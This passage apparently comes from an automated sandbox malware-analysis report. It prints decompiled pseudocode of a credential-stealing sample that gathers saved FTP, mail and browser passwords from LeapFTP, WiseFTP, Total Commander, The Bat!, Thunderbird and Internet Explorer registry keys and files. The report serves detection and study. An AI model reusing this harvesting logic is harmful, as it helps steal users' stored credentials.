                                                                        						_v2072 = E00401C8E(_a8, _v2068, "InstallPath", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "DataDir", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00404131(_a4, _v2072, "sites.dat", 0xbeef0000);
                                                                        							E00404131(_a4, _v2072, "sites.ini", 0xbeef0001);
                                                                        						}
                                                                        						if(_v2076 != 0) {
                                                                        							E00404131(_a4, _v2076, "sites.dat", 0xbeef0000);
                                                                        							E00404131(_a4, _v2076, "sites.ini", 0xbeef0001);
                                                                        						}
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004076F4(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t40;
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407707
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040773B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407856
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F8D4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t27;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        
                                                                        				_t29 = __eflags;
                                                                        				_t28 = __edx;
                                                                        				_t27 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x5f, 0);
                                                                        				 *0x415824 = 2;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                        				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				 *0x415824 = 3;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                        				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t28, _t29, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F902
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F947
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F962
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F9A7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004078AB(void* __ecx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t22;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        				char* _t31;
                                                                        				int _t32;
                                                                        				void* _t34;
                                                                        				void* _t36;
                                                                        				void* _t41;
                                                                        				char* _t42;
                                                                        				char* _t43;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0x1b, 0);
                                                                        				_t43 =  *0x414082; // 0x0
                                                                        				_t42 =  *0x414086; // 0x0
                                                                        				if( *_t42 == 0) {
                                                                        					L11:
                                                                        					E0040785F(_t49, _a4, 0x1a); // executed
                                                                        					E0040785F(_t49, _a4, 0x23); // executed
                                                                        					E0040785F(_t49, _a4, 0x1c); // executed
                                                                        					E004076F4(_a4,  *0x4140fe, "SOFTWARE\\LeapWare"); // executed
                                                                        					E004076F4(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
                                                                        					return E00401553(_t41, _t49, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t22 = StrStrA(_t43, "unleap.exe");
                                                                        					if(_t22 == 0) {
                                                                        						__eflags = StrStrIA(_t42, "leapftp");
                                                                        						if(__eflags != 0) {
                                                                        							_t26 = E0040234A(__eflags, _t43);
                                                                        							_push(_t26);
                                                                        							E00404131(_a4, _t26, "sites.dat", 0xbeef0000);
                                                                        							_t28 = _t26;
                                                                        							E00404131(_a4, _t28, "sites.ini", 0xbeef0001);
                                                                        							E004017D5();
                                                                        						}
                                                                        					} else {
                                                                        						_t31 = _t22 + 1;
                                                                        						if( *_t31 != 0) {
                                                                        							_t32 = lstrlenA("unleap.exe");
                                                                        							_t41 = _t31;
                                                                        							_t34 = E0040234A(_t32 + _t41, _t32 + _t41);
                                                                        							_push(_t34);
                                                                        							E00404131(_a4, _t34, "sites.dat", 0xbeef0000);
                                                                        							_t36 = _t34;
                                                                        							E00404131(_a4, _t36, "sites.ini", 0xbeef0001);
                                                                        							E004017D5();
                                                                        						}
                                                                        					}
                                                                        					while( *_t43 != 0) {
                                                                        						_t43 =  &(_t43[1]);
                                                                        						__eflags = _t43;
                                                                        					}
                                                                        					_t43 =  &(_t43[1]);
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t49 =  *_t42;
                                                                        				} while ( *_t42 != 0);
                                                                        				goto L11;
                                                                        			}














                                                                        APIs
                                                                        • StrStrA.SHLWAPI(00000000,unleap.exe), ref: 004078DD
                                                                        • lstrlenA.KERNEL32(unleap.exe,00000001,00000000,unleap.exe), ref: 004078F2
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • StrStrIA.SHLWAPI(00000000,leapftp,00000000,unleap.exe), ref: 00407936
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                                                        • API String ID: 1884169789-1497043051
                                                                        • Opcode ID: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
                                                                        • Instruction ID: 9698fba736c6e1230d64bcfce157fb16b9fb49397a8a83bf77b3dc4cab1f149d
                                                                        • Opcode Fuzzy Hash: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
                                                                        • Instruction Fuzzy Hash: 3821D5B1644504B9EB113B21CC06FEE3E1A9B90314F20803BBA05B95F3D7BC5EC1969E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040EFFB(intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				intOrPtr _t36;
                                                                        				intOrPtr _t37;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t43;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t53;
                                                                        				void* _t62;
                                                                        
                                                                        				_t36 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
                                                                        				_t37 = _t36;
                                                                        				if(_t37 != 0) {
                                                                        					_v8 = _t37;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t38 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
                                                                        				_t39 = _t38;
                                                                        				if(_t39 != 0) {
                                                                        					_v8 = _t39;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t40 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
                                                                        				_t41 = _t40;
                                                                        				if(_t41 != 0) {
                                                                        					_v8 = _t41;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t43 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
                                                                        				_t44 = _t43;
                                                                        				if(_t44 != 0) {
                                                                        					_v12 = _t44;
                                                                        					if(_v16 != 4) {
                                                                        						L17:
                                                                        						return E004017D5(_v12);
                                                                        					}
                                                                        					_t47 =  *_v12;
                                                                        					if(_t47 > 0x2710) {
                                                                        						_t47 = 0x2710;
                                                                        					}
                                                                        					_v20 = _t47;
                                                                        					while(_v20 != 0) {
                                                                        						wsprintfA( &_v60, "Dir #%d", _v20);
                                                                        						_t62 = _t62 + 0xc;
                                                                        						_t53 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
                                                                        						if(_t53 != 0) {
                                                                        							_v8 = _t53;
                                                                        							if(_v64 > 3) {
                                                                        								E0040EF86(_a4, _v8);
                                                                        							}
                                                                        							E004017D5(_v8);
                                                                        						}
                                                                        						_v20 = _v20 - 1;
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				return _t44;
                                                                        			}




















                                                                        APIs
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • wsprintfA.USER32 ref: 0040F0D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalwsprintf
                                                                        • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                                        • API String ID: 988369812-1921698578
                                                                        • Opcode ID: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
                                                                        • Instruction ID: efec917b93c5790ddd6963f177ddc18cbde9d62d709c2f7ca4761b08757c98aa
                                                                        • Opcode Fuzzy Hash: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
                                                                        • Instruction Fuzzy Hash: 5F310771E40109FADF21AFA1DC42ADD7B72AB00304F244477B814B65E1E77A9BA4AB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404A31(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				CHAR* _v12;
                                                                        				intOrPtr _v16;
                                                                        				int _t37;
                                                                        				void* _t39;
                                                                        				void* _t41;
                                                                        				void* _t42;
                                                                        				void* _t43;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				intOrPtr _t50;
                                                                        				void* _t51;
                                                                        				intOrPtr _t54;
                                                                        				void* _t55;
                                                                        				intOrPtr _t57;
                                                                        				intOrPtr _t58;
                                                                        				void* _t59;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr _t62;
                                                                        				void* _t79;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 2, 0);
                                                                        				"_cx_ftp.ini" = 0x77;
                                                                        				M004149B3 = 0x47;
                                                                        				"_hisler\\Total Commander" = 0x47;
                                                                        				_v12 = E004017EC(0x105);
                                                                        				_t37 = GetWindowsDirectoryA(_v12, 0x104);
                                                                        				if(_t37 == 0) {
                                                                        					L3:
                                                                        					E004017D5(_v12);
                                                                        				} else {
                                                                        					_t82 = _t37 - 0x104;
                                                                        					if(_t37 > 0x104) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						E004048FE(_a4, _v12); // executed
                                                                        					}
                                                                        				}
                                                                        				_t39 = E00401DCE(_t82, 0x28); // executed
                                                                        				E004048FE(_a4, _t39); // executed
                                                                        				_t41 = E00401DCE(_t82, 0x1a); // executed
                                                                        				_t42 = _t41;
                                                                        				_t83 = _t42;
                                                                        				if(_t42 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t42, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t43 = E00401DCE(_t83, 0x23); // executed
                                                                        				_t44 = _t43;
                                                                        				_t84 = _t44;
                                                                        				if(_t44 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t44, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t45 = E00401DCE(_t84, 0x1c); // executed
                                                                        				_t46 = _t45;
                                                                        				if(_t45 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t46, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t47 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t47);
                                                                        				_t50 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "FtpIniName", 0);
                                                                        				if(_t50 != 0) {
                                                                        					_v16 = _t50;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t51 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t51);
                                                                        				_t54 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "FtpIniName", 0);
                                                                        				if(_t54 != 0) {
                                                                        					_v16 = _t54;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t55 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t55);
                                                                        				_t57 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 != 0) {
                                                                        					_v16 = _t58;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t59 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t59);
                                                                        				_t61 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "FtpIniName", 0); // executed
                                                                        				_t62 = _t61;
                                                                        				_t89 = _t62;
                                                                        				if(_t62 != 0) {
                                                                        					_v16 = _t62;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				return E00401553(_t79, _t89, _a4, _v8);
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404A70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocDirectoryLocalWindows
                                                                        • String ID: FtpIniName$InstallDir$Software\_hisler\Total Commander$Software\_hisler\Windows Commander$\GHISLER
                                                                        • API String ID: 3186838798-174342358
                                                                        • Opcode ID: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
                                                                        • Instruction ID: af35828189b00225af904a715eab3383fb197f901e28e357ccde0e703416f596
                                                                        • Opcode Fuzzy Hash: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
                                                                        • Instruction Fuzzy Hash: BD5156F5AA4249BAEF013BB2CD03FAD7E659F80748F10803B7614740F1DABD8950AA5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
                                                                        				char _v24;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _v64;
                                                                        				char _v68;
                                                                        				void* _v72;
                                                                        				char _v76;
                                                                        				void* _v80;
                                                                        				char _v84;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				void* _t80;
                                                                        				signed int _t81;
                                                                        				void* _t84;
                                                                        				void* _t85;
                                                                        
                                                                        				_t80 = __ecx;
                                                                        				_t50 = lstrlenW(_a8);
                                                                        				if(_t50 != 0) {
                                                                        					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
                                                                        					_t81 = 0;
                                                                        					_v48 = 0;
                                                                        					while(_t81 < 0x14) {
                                                                        						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
                                                                        						_t81 = _t81 + 1;
                                                                        					}
                                                                        					_t84 = 0;
                                                                        					_v52 = 0;
                                                                        					while(_t84 < 0x14) {
                                                                        						_push( *(_t84 +  &_v24) & 0x000000ff);
                                                                        						wsprintfA( &_v44, "%02X");
                                                                        						_t85 = _t85 + 0xc;
                                                                        						_v52 = E00401D69(_v52,  &_v44);
                                                                        						_t84 = _t84 + 1;
                                                                        					}
                                                                        					_v48 = _v48 & 0x000000ff;
                                                                        					_push(_v48);
                                                                        					wsprintfA( &_v44, "%02X");
                                                                        					_v52 = E00401D69(_v52,  &_v44);
                                                                        					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
                                                                        					_t67 = _t66;
                                                                        					if(_t67 != 0) {
                                                                        						_v60 = _t67;
                                                                        						if(_v56 != 0) {
                                                                        							_v84 = (lstrlenW(_a8) << 1) + 2;
                                                                        							_push(_a8);
                                                                        							_pop( *_t30);
                                                                        							_push(_v56);
                                                                        							_pop( *_t32);
                                                                        							_push(_v60);
                                                                        							_pop( *_t34);
                                                                        							_v72 = 0;
                                                                        							if( *0x41442d != 0) {
                                                                        								_push( &_v76);
                                                                        								_push(1);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push( &_v84);
                                                                        								_push(0);
                                                                        								_push( &_v68);
                                                                        								if( *0x41442d() != 0 && _v72 != 0) {
                                                                        									if(_a12 != 0) {
                                                                        										 *_a12 = 0x3f;
                                                                        									}
                                                                        									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
                                                                        									LocalFree(_v72);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v60);
                                                                        					}
                                                                        					return E004017D5(_v52);
                                                                        				} else {
                                                                        					return _t50;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0040A36E
                                                                        • wsprintfA.USER32 ref: 0040A3EB
                                                                        • lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
                                                                        • LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocalwsprintf
                                                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                        • API String ID: 63427805-2450551051
                                                                        • Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
                                                                        • Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004046FB(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        
                                                                        				_t38 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t39 = _t38;
                                                                        				if(_t39 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t44);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004046FB(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t39;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404711
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00404745
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040486C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostName$Password$User
                                                                        • API String ID: 1332880857-1253078594
                                                                        • Opcode ID: 456df55e986297148e0821ab1377b2a8a1e2b73cd74ff392dbd48bce8802ae55
                                                                        • Instruction ID: 274f6807b80e73b8c345a4adb4ff243209de0c90348e176c4e7a203eb37303a1
                                                                        • Opcode Fuzzy Hash: 456df55e986297148e0821ab1377b2a8a1e2b73cd74ff392dbd48bce8802ae55
                                                                        • Instruction Fuzzy Hash: 0C31077194011CBADF216FA2CC42BDD7AB9BF44304F10C0BAB644751B1EBB95A929F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00408C47(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t34;
                                                                        				long _t35;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr _t50;
                                                                        				void* _t57;
                                                                        
                                                                        				_t57 = __ecx;
                                                                        				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t35 = _t34;
                                                                        				if(_t35 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t40);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, 0, 0);
                                                                        						_t46 = E0040234A(__eflags, _v2072);
                                                                        						__eflags = _t46;
                                                                        						if(_t46 == 0) {
                                                                        							L8:
                                                                        							E004017D5(_v2072);
                                                                        							E00408C47(_t57, _a4, _a8, _v2068);
                                                                        							E004017D5(_v2068);
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        						_push(_t46);
                                                                        						_v2076 = _t46;
                                                                        						_t50 = E00401E9C(_v2076);
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							E00404131(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
                                                                        							E00404131(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
                                                                        							E00404131(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
                                                                        						}
                                                                        						E004017D5();
                                                                        						goto L8;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t35;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00408C8E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                                        • API String ID: 1332880857-3184955129
                                                                        • Opcode ID: 06672daf011954082bece32e1c368350ee560e60d4156fddcc54f2a78b540f3f
                                                                        • Instruction ID: 6933cf3e983a815ab224151528d9636a50beec05a79b4a1705713022bd00aa48
                                                                        • Opcode Fuzzy Hash: 06672daf011954082bece32e1c368350ee560e60d4156fddcc54f2a78b540f3f
                                                                        • Instruction Fuzzy Hash: 2B31287190010CBADF216F61CD42FDDBABABF50304F1080BAB684B51E1DE799A919F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E0040A4C5(intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				short _v44;
                                                                        				WCHAR* _v48;
                                                                        				char _v52;
                                                                        				char _v56;
                                                                        				short _v60;
                                                                        				char* _t34;
                                                                        				void* _t35;
                                                                        				short* _t45;
                                                                        				void* _t47;
                                                                        
                                                                        				_t34 =  &_v8;
                                                                        				_push(_t34);
                                                                        				_push(0x415a7d);
                                                                        				_push(5);
                                                                        				_push(0);
                                                                        				_push(0x415a6d); // executed
                                                                        				L00410DD0(); // executed
                                                                        				if(_t34 < 0) {
                                                                        					L15:
                                                                        					_t35 = E0040A364(_t47, _a4, L"http://www.facebook.com/", 0); // executed
                                                                        					return _t35;
                                                                        				}
                                                                        				_push( &_v12);
                                                                        				_push(_v8);
                                                                        				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
                                                                        					L14:
                                                                        					 *((intOrPtr*)( *_v8 + 8))(_v8);
                                                                        					goto L15;
                                                                        				} else {
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v52 = 0x28;
                                                                        					while(1) {
                                                                        						_v56 = 0;
                                                                        						_push( &_v56);
                                                                        						_push( &_v52);
                                                                        						_push(1);
                                                                        						_push(_v12);
                                                                        						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v48 != 0) {
                                                                        							_t45 = StrStrIW(_v48, 0x415a9d);
                                                                        							if(_t45 == 0) {
                                                                        								_v60 = 0;
                                                                        							} else {
                                                                        								 *_t45 = 0;
                                                                        								_v60 = _t45;
                                                                        							}
                                                                        							E0040A364(_t47, _a4, _v48, _v60); // executed
                                                                        							_push(_v48);
                                                                        							L00410DCA();
                                                                        							if(_v44 != 0) {
                                                                        								_push(_v44);
                                                                        								L00410DCA();
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)( *_v12 + 8))(_v12);
                                                                        					goto L14;
                                                                        				}
                                                                        			}















                                                                        APIs
